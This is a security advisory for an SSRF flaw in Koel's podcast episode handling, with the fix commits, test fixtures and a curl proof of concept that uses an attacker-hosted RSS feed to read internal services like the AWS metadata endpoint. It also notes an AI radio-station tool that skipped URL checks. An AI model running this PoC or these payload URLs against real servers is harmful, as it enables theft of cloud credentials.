Koel Vulnerable to SSRF via Podcast Episode Enclosure URLs
Description
Summary
Koel validates the podcast feed URL via the SafeUrl rule (DNS resolution + public IP check), but the individual episode ` values extracted from the RSS XML are stored directly into the database without any SSRF validation. When a user plays an episode, the server downloads the full HTTP response from the unvalidated enclosure URL via Http::sink()->get()` and streams it back to the user, enabling full-read SSRF against internal services.
---
Vulnerability
Details
Episode
URL Stored Without Validation
File: app/Services/Podcast/PodcastService.php, line 146
'path' => $episodeValue->enclosure->url, // Unvalidated URL from RSS XML
The SafeUrl rule is applied to the podcast feed URL at subscription time (SubscribeToPodcastRequest), but episode enclosure URLs parsed from the feed XML are stored as-is.
SSRF
Trigger: Full Content Download
File: app/Values/Podcast/EpisodePlayable.php, line 42
Http::sink($file)->get($episode->path)->throw();
When an episode is played, PodcastStreamerAdapter::stream() first attempts getStreamableUrl() (OPTIONS/HEAD requests to the episode URL). If no CORS header is present (which internal services won't have), it falls through to EpisodePlayable::createForEpisode(), which downloads the full response body and streams it back to the user.
SafeUrl
Applied Only to Feed URL
File: app/Http/Requests/API/Podcast/SubscribeToPodcastRequest.php
public function rules(): array
{
return ['url' => ['required', 'url:http,https', new SafeUrl]];
}
The SafeUrl rule (app/Rules/SafeUrl.php) validates scheme, DNS resolution to public IP, and effective URL after redirects. But this only protects the feed URL — not the content within the feed.
---
Attack
Flow
1. Attacker registers an account (Community edition, no Plus required) 2. Attacker hosts a malicious RSS feed on a public server: ``xml Legit Podcast Episode 1 ssrf-1 ``
POST /api/podcastswithurl=https://evil.com/feed.xml— passesSafeUrl(public URL)- Koel parses feed, stores episode with
path = http://169.254.169.254/... - Attacker plays episode:
GET /play/{episode_id} - Server executes
Http::sink($file)->get("http://169.254.169.254/...") - AWS metadata response downloaded to disk, streamed back to attacker
---
Proof of
Concept
#!/bin/bash
# PoC: Koel SSRF via Podcast Episode Enclosure URL
# Step 1: Host malicious RSS feed (feed.xml) on attacker server
# Step 2: Subscribe to the podcast
KOEL_URL="https://TARGET"
API_TOKEN="<api_token>"
# Subscribe to malicious podcast
curl -X POST "$KOEL_URL/api/podcasts" \
-H "Authorization: Bearer $API_TOKEN" \
-H "Content-Type: application/json" \
-d '{"url": "https://attacker.com/feed.xml"}'
# List episodes to get the episode ID
EPISODE_ID=$(curl -s "$KOEL_URL/api/podcasts" \
-H "Authorization: Bearer $API_TOKEN" | jq -r '.[0].episodes[0].id')
# Play the episode — triggers SSRF, returns internal service response
curl "$KOEL_URL/play/$EPISODE_ID?api_token=$API_TOKEN" -o response.bin
cat response.bin
# Expected: AWS metadata / internal service response
---
Impact
- Cloud credential theft: Read AWS/GCP/Azure metadata endpoints (IAM credentials, tokens)
- Internal network reconnaissance: Scan ports and enumerate internal HTTP services
- Data exfiltration: Read responses from internal APIs, admin panels, databases with HTTP interfaces
- Full response body: Unlike blind SSRF, the entire response is returned to the attacker
---
Secondary
Finding: SSRF Bypass via AI Radio Station Tool
File: app/Ai/Tools/AddRadioStation.php, lines 35-38
The AI assistant's AddRadioStation tool creates radio stations by calling RadioService::createRadioStation() directly, bypassing the SafeUrl and HasAudioContentType validation rules that protect the REST API endpoint.
Impact: Same SSRF but requires Plus license. CVSS 7.7 HIGH.
---
Novelty
Check
- No existing CVEs found for Koel (searched NVD, GitHub Advisories, web)
- No SECURITY.md in the repository
- This is a novel vulnerability
---
Remediation
Fix 1: Validate episode enclosure URLs in synchronizeEpisodes():
foreach ($episodeCollection as $episodeValue) {
$enclosureUrl = $episodeValue->enclosure->url;
$host = parse_url($enclosureUrl, PHP_URL_HOST);
if (!$host || !Network::isPublicHost($host)) {
continue; // Skip episodes with non-public URLs
}
// ... rest of episode creation
}
Fix 2: Defense-in-depth validation at playback time in EpisodePlayable::createForEpisode().
Fix 3: Add SafeUrl validation in AddRadioStation AI tool.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Koel stores podcast episode enclosure URLs without SSRF validation, allowing authenticated users to trigger full-read SSRF against internal services via malicious RSS feeds.
Vulnerability
Koel validates the podcast feed URL using the SafeUrl rule (DNS resolution + public IP check) at subscription time, but episode ` values parsed from the RSS XML are stored directly into the database without any SSRF validation [1][2]. In app/Services/Podcast/PodcastService.php (line 146), the enclosure URL is assigned to the path field without sanitization. All versions of Koel prior to the security patch (commit 8708f077efd7d8a332b32e954d65bc837f3a413a`) are affected.
Exploitation
An attacker with a registered account (Community edition, no Plus required) hosts a malicious RSS feed on a public server containing an ` element pointing to an internal service (e.g., http://169.254.169.254/latest/meta-data/iam/security-credentials/). After subscribing to this feed, the attacker (or any user) plays the episode. The server first attempts getStreamableUrl() (OPTIONS/HEAD requests); if no CORS header is present, it falls through to EpisodePlayable::createForEpisode(), which downloads the full HTTP response from the unvalidated enclosure URL via Http::sink()->get()` and streams it back to the user [1][2].
Impact
Successful exploitation enables full-read server-side request forgery (SSRF). An attacker can read sensitive data from internal services, such as cloud metadata endpoints (e.g., AWS IAM credentials), internal APIs, or other services reachable from the Koel server. The attacker gains the ability to exfiltrate the contents of HTTP responses from internal hosts, potentially leading to credential disclosure or further compromise.
Mitigation
The vulnerability is fixed in commit 8708f077efd7d8a332b32e954d65bc837f3a413a, which adds SSRF validation (Network::isSafeUrl()) to the episode URL before download [3]. A subsequent commit (be1e867982dcadefd4a75d768ce950b1d5234cdf) also validates redirect targets during episode download [4]. Users should upgrade to a version containing these fixes. No workaround is available; the vulnerability is not listed on CISA's Known Exploited Vulnerabilities (KEV) catalog as of the publication date.
AI Insight generated on May 29, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
3Patches
2be1e867982dcfix: validate redirect targets when downloading podcast episodes (#2486)
2 files changed · +39 −3
app/Values/Podcast/EpisodePlayable.php+17 −3 modified@@ -41,11 +41,25 @@ private static function createForEpisode(Episode $episode): self $file = artifact_path("episodes/{$episode->id}.mp3"); if (!File::exists($file)) { - if (!Network::isSafeUrl((string) $episode->path)) { - throw UnsafeUrlException::forUrl((string) $episode->path); + $url = (string) $episode->path; + + if (!Network::isSafeUrl($url)) { + throw UnsafeUrlException::forUrl($url); } - Http::sink($file)->get($episode->path)->throw(); + Http::sink($file) + ->withOptions([ + 'allow_redirects' => [ + 'max' => 5, + 'on_redirect' => static function ($request, $response, $uri): void { + if (!Network::isSafeUrl((string) $uri)) { + throw UnsafeUrlException::forUrl((string) $uri); + } + }, + ], + ]) + ->get($url) + ->throw(); } $playable = new self($file, File::hash($file));
tests/Integration/Values/EpisodePlayableTest.php+22 −0 modified@@ -61,4 +61,26 @@ public function refusesToFetchUnsafeUrl(): void Http::assertNothingSent(); } } + + #[Test] + public function refusesToFollowRedirectToUnsafeUrl(): void + { + Http::fake([ + 'https://public.example.com/episode.mp3' => Http::response('', 302, [ + 'Location' => 'http://169.254.169.254/latest/meta-data/iam/security-credentials/', + ]), + 'http://169.254.169.254/*' => Http::response('credentials-should-not-be-fetched'), + ]); + + $episode = Song::factory()->asEpisode()->createOne(['path' => 'https://public.example.com/episode.mp3']); + + self::expectException(UnsafeUrlException::class); + + try { + EpisodePlayable::getForEpisode($episode); + } finally { + // The redirect target must never be requested. + Http::assertNotSent(static fn ($request) => str_contains($request->url(), '169.254.169.254')); + } + } }
8708f077efd7fix: validate URLs at podcast sync, playback, and radio AI tool (GHSA-7j2f-6h2r-6cqc) (#2485)
10 files changed · +341 −1
app/Ai/Tools/AddRadioStation.php+21 −0 modified@@ -4,9 +4,14 @@ use App\Ai\AiAssistantResult; use App\Ai\AiRequestContext; +use App\Rules\HasAudioContentType; +use App\Rules\SafeUrl; use App\Services\RadioService; use App\Values\Radio\RadioStationCreateData; use Illuminate\Contracts\JsonSchema\JsonSchema; +use Illuminate\Database\Query\Builder; +use Illuminate\Support\Facades\Validator; +use Illuminate\Validation\Rule; use Laravel\Ai\Contracts\Tool; use Laravel\Ai\Tools\Request; use Stringable; @@ -34,6 +39,22 @@ public function schema(JsonSchema $schema): array public function handle(Request $request): Stringable|string { + $userId = $this->context->user->id; + + $validator = Validator::make(['url' => $request['url']], [ + 'url' => [ + 'required', + 'url', + Rule::unique('radio_stations')->where(static fn (Builder $query) => $query->where('user_id', $userId)), + new SafeUrl(), + new HasAudioContentType(), + ], + ]); + + if ($validator->fails()) { + return sprintf('Cannot add radio station: %s', $validator->errors()->first('url')); + } + $station = $this->radioService->createRadioStation( RadioStationCreateData::make(url: $request['url'], name: $request['name'], description: ''), $this->context->user,
app/Exceptions/UnsafeUrlException.php+13 −0 added@@ -0,0 +1,13 @@ +<?php + +namespace App\Exceptions; + +use RuntimeException; + +class UnsafeUrlException extends RuntimeException +{ + public static function forUrl(string $url): self + { + return new self(sprintf('Refusing to fetch URL that does not resolve to a public host: %s', $url)); + } +}
app/Helpers/Network.php+25 −0 modified@@ -2,10 +2,35 @@ namespace App\Helpers; +use Illuminate\Support\Uri; use Throwable; class Network { + private const array SAFE_URL_SCHEMES = ['http', 'https']; + + /** + * Check if a URL is safe to reach: HTTP/HTTPS scheme + a public host. + * Does NOT perform any network calls beyond DNS resolution. + * For full validation including effective-URL-after-redirect, use the SafeUrl validation rule. + */ + public static function isSafeUrl(string $url): bool + { + try { + $uri = Uri::of($url); + } catch (Throwable) { + return false; + } + + if (!in_array($uri->scheme(), self::SAFE_URL_SCHEMES, true)) { + return false; + } + + $host = $uri->host(); + + return $host !== '' && self::isPublicHost($host); + } + /** * Check if a host resolves only to public (non-private, non-reserved) IP addresses. * Validates both A (IPv4) and AAAA (IPv6) records. All resolved IPs must be public.
app/Services/Podcast/PodcastService.php+19 −1 modified@@ -5,6 +5,7 @@ use App\Events\UserUnsubscribedFromPodcast; use App\Exceptions\FailedToParsePodcastFeedException; use App\Exceptions\UserAlreadySubscribedToPodcastException; +use App\Helpers\Network; use App\Helpers\Uuid; use App\Models\Podcast; use App\Models\PodcastUserPivot; @@ -136,14 +137,26 @@ private function synchronizeEpisodes(Podcast $podcast, EpisodeCollection $episod continue; } + $enclosureUrl = (string) $episodeValue->enclosure->url; + + if (!Network::isSafeUrl($enclosureUrl)) { + Log::warning(sprintf( + 'Skipping podcast episode "%s" with unsafe enclosure URL: %s', + $episodeValue->title, + $enclosureUrl, + )); + + continue; + } + $id = Uuid::generate(); $ids[] = $id; $records[] = [ 'id' => $id, 'podcast_id' => $podcast->id, 'title' => $episodeValue->title, 'lyrics' => '', - 'path' => $episodeValue->enclosure->url, + 'path' => $enclosureUrl, 'created_at' => $episodeValue->metadata->pubDate ?: now(), 'updated_at' => $episodeValue->metadata->pubDate ?: now(), 'episode_metadata' => $episodeValue->metadata->toJson(), @@ -226,6 +239,11 @@ public function isPodcastObsolete(Podcast $podcast): bool public function getStreamableUrl(string|Episode $url, ?Client $client = null, string $method = 'OPTIONS'): ?string { $url = $url instanceof Episode ? $url->path : $url; + + if (!Network::isSafeUrl($url)) { + return null; + } + $client ??= new Client(); try {
app/Values/Podcast/EpisodePlayable.php+6 −0 modified@@ -2,6 +2,8 @@ namespace App\Values\Podcast; +use App\Exceptions\UnsafeUrlException; +use App\Helpers\Network; use App\Models\Song as Episode; use Illuminate\Contracts\Support\Arrayable; use Illuminate\Contracts\Support\Jsonable; @@ -39,6 +41,10 @@ private static function createForEpisode(Episode $episode): self $file = artifact_path("episodes/{$episode->id}.mp3"); if (!File::exists($file)) { + if (!Network::isSafeUrl((string) $episode->path)) { + throw UnsafeUrlException::forUrl((string) $episode->path); + } + Http::sink($file)->get($episode->path)->throw(); }
tests/Feature/KoelPlus/Ai/AddRadioStationToolTest.php+101 −0 added@@ -0,0 +1,101 @@ +<?php + +namespace Tests\Feature\KoelPlus\Ai; + +use App\Ai\AiAssistantResult; +use App\Ai\AiRequestContext; +use App\Ai\Tools\AddRadioStation; +use App\Models\RadioStation; +use App\Models\User; +use Illuminate\Support\Facades\Http; +use Laravel\Ai\Tools\Request; +use PHPUnit\Framework\Attributes\DataProvider; +use PHPUnit\Framework\Attributes\Test; +use Tests\PlusTestCase; + +use function Tests\create_user; + +class AddRadioStationToolTest extends PlusTestCase +{ + private AiAssistantResult $result; + private User $user; + private AddRadioStation $tool; + + public function setUp(): void + { + parent::setUp(); + + $this->user = create_user(); + $this->result = new AiAssistantResult(); + + app()->instance(AiAssistantResult::class, $this->result); + app()->instance(AiRequestContext::class, new AiRequestContext($this->user)); + $this->tool = app()->make(AddRadioStation::class); + } + + #[Test] + public function addsRadioStationWithSafePublicUrl(): void + { + Http::fake([ + 'https://example.com/stream.mp3' => Http::response('', 200, ['Content-Type' => 'audio/mpeg']), + ]); + + $response = $this->tool->handle(new Request([ + 'name' => 'Test Radio', + 'url' => 'https://example.com/stream.mp3', + ])); + + self::assertStringContainsString('Test Radio', (string) $response); + self::assertStringContainsString('added successfully', (string) $response); + + $this->assertDatabaseHas(RadioStation::class, [ + 'url' => 'https://example.com/stream.mp3', + 'name' => 'Test Radio', + 'user_id' => $this->user->id, + ]); + } + + /** @return array<string, array{string}> */ + public static function provideUnsafeUrls(): array + { + return [ + 'AWS metadata IP' => ['http://169.254.169.254/latest/meta-data/'], + 'loopback IPv4' => ['http://127.0.0.1/admin'], + 'private 192.168.x' => ['http://192.168.1.1/secrets'], + 'private 10.x' => ['http://10.0.0.1/internal'], + 'file scheme' => ['file:///etc/passwd'], + 'ftp scheme' => ['ftp://example.com/stream'], + ]; + } + + #[Test, DataProvider('provideUnsafeUrls')] + public function refusesUnsafeUrl(string $unsafeUrl): void + { + Http::fake(); + + $response = $this->tool->handle(new Request([ + 'name' => 'SSRF Attempt', + 'url' => $unsafeUrl, + ])); + + self::assertStringContainsString('Cannot add radio station', (string) $response); + $this->assertDatabaseMissing(RadioStation::class, ['url' => $unsafeUrl]); + } + + #[Test] + public function refusesDuplicateUrlForSameUser(): void + { + Http::fake([ + 'https://example.com/stream.mp3' => Http::response('', 200, ['Content-Type' => 'audio/mpeg']), + ]); + + RadioStation::factory()->for($this->user)->createOne(['url' => 'https://example.com/stream.mp3']); + + $response = $this->tool->handle(new Request([ + 'name' => 'Duplicate', + 'url' => 'https://example.com/stream.mp3', + ])); + + self::assertStringContainsString('Cannot add radio station', (string) $response); + } +}
tests/fixtures/podcast-with-unsafe-enclosures.xml+69 −0 added@@ -0,0 +1,69 @@ +<?xml version="1.0" encoding="UTF-8"?> +<rss version="2.0"> + <channel> + <title>Mixed Podcast</title> + <link>https://example.com</link> + <description>Mix of safe and unsafe enclosure URLs</description> + <language>en-US</language> + + <item> + <title>Episode 1 (safe)</title> + <description>A safe public episode</description> + <enclosure + length="1000" + type="audio/mpeg" + url="https://example.com/episodes/safe.mp3" + /> + <guid>safe-1</guid> + <pubDate>Tue, 8 Jan 2019 01:15:00 GMT</pubDate> + </item> + + <item> + <title>Episode 2 (AWS metadata SSRF)</title> + <description>Attempts to exfiltrate AWS IAM credentials</description> + <enclosure + length="1000" + type="audio/mpeg" + url="http://169.254.169.254/latest/meta-data/iam/security-credentials/" + /> + <guid>unsafe-1</guid> + <pubDate>Tue, 8 Jan 2019 01:15:00 GMT</pubDate> + </item> + + <item> + <title>Episode 3 (loopback SSRF)</title> + <description>Attempts to read local services</description> + <enclosure + length="1000" + type="audio/mpeg" + url="http://127.0.0.1:6379/INFO" + /> + <guid>unsafe-2</guid> + <pubDate>Tue, 8 Jan 2019 01:15:00 GMT</pubDate> + </item> + + <item> + <title>Episode 4 (private network SSRF)</title> + <description>Attempts to scan internal network</description> + <enclosure + length="1000" + type="audio/mpeg" + url="http://10.0.0.1/admin" + /> + <guid>unsafe-3</guid> + <pubDate>Tue, 8 Jan 2019 01:15:00 GMT</pubDate> + </item> + + <item> + <title>Episode 5 (file scheme)</title> + <description>Attempts to read local file</description> + <enclosure + length="1000" + type="audio/mpeg" + url="file:///etc/passwd" + /> + <guid>unsafe-4</guid> + <pubDate>Tue, 8 Jan 2019 01:15:00 GMT</pubDate> + </item> + </channel> +</rss>
tests/Integration/Services/Podcast/PodcastServiceTest.php+34 −0 modified@@ -14,6 +14,7 @@ use GuzzleHttp\Psr7\Response; use Illuminate\Support\Facades\Event; use Illuminate\Support\Facades\Http; +use PHPUnit\Framework\Attributes\DataProvider; use PHPUnit\Framework\Attributes\Test; use Psr\Http\Client\ClientInterface; use Tests\TestCase; @@ -247,6 +248,39 @@ public function deletePodcast(): void self::assertModelMissing($podcast); } + #[Test] + public function addPodcastSkipsEpisodesWithUnsafeEnclosureUrls(): void + { + $mock = new MockHandler([ + new Response(200, [], file_get_contents(test_path('fixtures/podcast-with-unsafe-enclosures.xml'))), + ]); + + $this->instance(ClientInterface::class, new Client(['handler' => HandlerStack::create($mock)])); + $service = app(PodcastService::class); + + $podcast = $service->addPodcast('https://example.com/feed.xml', create_user()); + + self::assertCount(1, $podcast->episodes); + self::assertSame('https://example.com/episodes/safe.mp3', $podcast->episodes->first()->path); + } + + /** @return array<string, array{string}> */ + public static function provideUnsafeStreamableUrls(): array + { + return [ + 'AWS metadata IP' => ['http://169.254.169.254/latest/meta-data/'], + 'loopback IPv4' => ['http://127.0.0.1:6379/INFO'], + 'private 10.x' => ['http://10.0.0.1/admin'], + 'file scheme' => ['file:///etc/passwd'], + ]; + } + + #[Test, DataProvider('provideUnsafeStreamableUrls')] + public function getStreamableUrlRejectsUnsafeUrl(string $url): void + { + self::assertNull($this->service->getStreamableUrl($url)); + } + #[Test] public function refreshPodcastUsesLastBuildDateWhenPubDateIsStale(): void {
tests/Integration/Values/EpisodePlayableTest.php+21 −0 modified@@ -2,6 +2,7 @@ namespace Tests\Integration\Values; +use App\Exceptions\UnsafeUrlException; use App\Models\Song; use App\Values\Podcast\EpisodePlayable; use Illuminate\Support\Facades\Cache; @@ -40,4 +41,24 @@ public function createAndRetrieved(): void file_put_contents($playable->path, 'bar'); self::assertFalse($retrieved->valid()); } + + #[Test] + public function refusesToFetchUnsafeUrl(): void + { + Http::fake(); + + $episode = Song::factory() + ->asEpisode() + ->createOne([ + 'path' => 'http://169.254.169.254/latest/meta-data/iam/security-credentials/', + ]); + + self::expectException(UnsafeUrlException::class); + + try { + EpisodePlayable::getForEpisode($episode); + } finally { + Http::assertNothingSent(); + } + } }
tests/Unit/Helpers/NetworkTest.php+32 −0 modified@@ -39,4 +39,36 @@ public function rejectsUnresolvableHost(): void { self::assertFalse(Network::isPublicHost('this-host-does-not-exist.invalid')); } + + #[Test] + public function isSafeUrlAcceptsPublicHttpUrl(): void + { + self::assertTrue(Network::isSafeUrl('https://example.com/feed.xml')); + self::assertTrue(Network::isSafeUrl('http://example.com/feed.xml')); + } + + /** @return array<string, array{string}> */ + public static function provideUnsafeUrls(): array + { + return [ + 'AWS metadata IP' => ['http://169.254.169.254/latest/meta-data/'], + 'loopback IPv4' => ['http://127.0.0.1/admin'], + 'private 192.168.x' => ['http://192.168.1.1/secrets'], + 'private 10.x' => ['http://10.0.0.1/internal'], + 'loopback IPv6' => ['http://[::1]/admin'], + 'file scheme' => ['file:///etc/passwd'], + 'ftp scheme' => ['ftp://example.com/feed'], + 'gopher scheme' => ['gopher://example.com/feed'], + 'no scheme' => ['example.com/feed'], + 'no host' => ['http:///path'], + 'empty string' => [''], + 'garbage' => ['not a url at all'], + ]; + } + + #[Test, DataProvider('provideUnsafeUrls')] + public function isSafeUrlRejectsUnsafeUrl(string $url): void + { + self::assertFalse(Network::isSafeUrl($url)); + } }
Vulnerability mechanics
Root cause
"Missing SSRF validation on podcast episode enclosure URLs extracted from RSS XML allows server-side request forgery against internal services."
Attack vector
An attacker registers an account (Community edition, no Plus required) and hosts a malicious RSS feed on a public server. The feed's `<enclosure url="...">` values point to internal services such as `http://169.254.169.254/latest/meta-data/iam/security-credentials/`. The attacker subscribes to the feed via `POST /api/podcasts` — the feed URL passes the `SafeUrl` rule because it is a public URL — and Koel stores the unvalidated enclosure URLs in the database. When the attacker plays the episode, the server downloads the full HTTP response from the internal URL and streams it back, enabling full-read SSRF [ref_id=1][ref_id=2]. A secondary vector exists via the AI Radio Station tool (`AddRadioStation`), which originally bypassed `SafeUrl` validation entirely, though this requires a Plus license [ref_id=1].
Affected code
The vulnerability spans three areas: `app/Services/Podcast/PodcastService.php` stores episode enclosure URLs from RSS XML without validation; `app/Values/Podcast/EpisodePlayable.php` downloads the full response from those URLs via `Http::sink()->get()`; and `app/Ai/Tools/AddRadioStation.php` bypasses `SafeUrl` and `HasAudioContentType` rules when creating radio stations through the AI assistant [ref_id=1][ref_id=2]. The patches add `Network::isSafeUrl()` checks in `PodcastService::synchronizeEpisodes()`, `EpisodePlayable::createForEpisode()`, and `AddRadioStation::handle()`, plus redirect-target validation in `EpisodePlayable` [patch_id=3106763][patch_id=3106762].
What the fix does
Patch `8708f07` [patch_id=3106762] adds `Network::isSafeUrl()` checks at three layers: during podcast synchronization in `PodcastService::synchronizeEpisodes()` to skip episodes with unsafe enclosure URLs; at playback time in `EpisodePlayable::createForEpisode()` to throw `UnsafeUrlException` before any HTTP request is made; and in the `AddRadioStation` AI tool to apply the same `SafeUrl` and `HasAudioContentType` rules that protect the REST API. Patch `be1e867` [patch_id=3106763] additionally validates redirect targets during the HTTP download in `EpisodePlayable`, ensuring that even if the initial URL is public, a redirect to a private IP (e.g., `http://169.254.169.254`) is rejected. Together these patches close the SSRF at every entry point — feed ingestion, playback, and AI tool invocation.
Preconditions
- authAttacker must have a registered account on the Koel instance (Community edition is sufficient)
- inputAttacker must host a publicly accessible RSS feed containing malicious enclosure URLs
- authFor the AI Radio Station vector, the attacker needs a Plus license
Reproduction
```bash #!/bin/bash # PoC: Koel SSRF via Podcast Episode Enclosure URL # Step 1: Host malicious RSS feed (feed.xml) on attacker server # Step 2: Subscribe to the podcast
KOEL_URL="https://TARGET" API_TOKEN="<api_token>"
# Subscribe to malicious podcast curl -X POST "$KOEL_URL/api/podcasts" \ -H "Authorization: Bearer $API_TOKEN" \ -H "Content-Type: application/json" \ -d '{"url": "https://attacker.com/feed.xml"}'
# List episodes to get the episode ID EPISODE_ID=$(curl -s "$KOEL_URL/api/podcasts" \ -H "Authorization: Bearer $API_TOKEN" | jq -r '.[0].episodes[0].id')
# Play the episode — triggers SSRF, returns internal service response curl "$KOEL_URL/play/$EPISODE_ID?api_token=$API_TOKEN" -o response.bin
cat response.bin # Expected: AWS metadata / internal service response ```
Generated on May 29, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
4News mentions
0No linked articles in our index yet.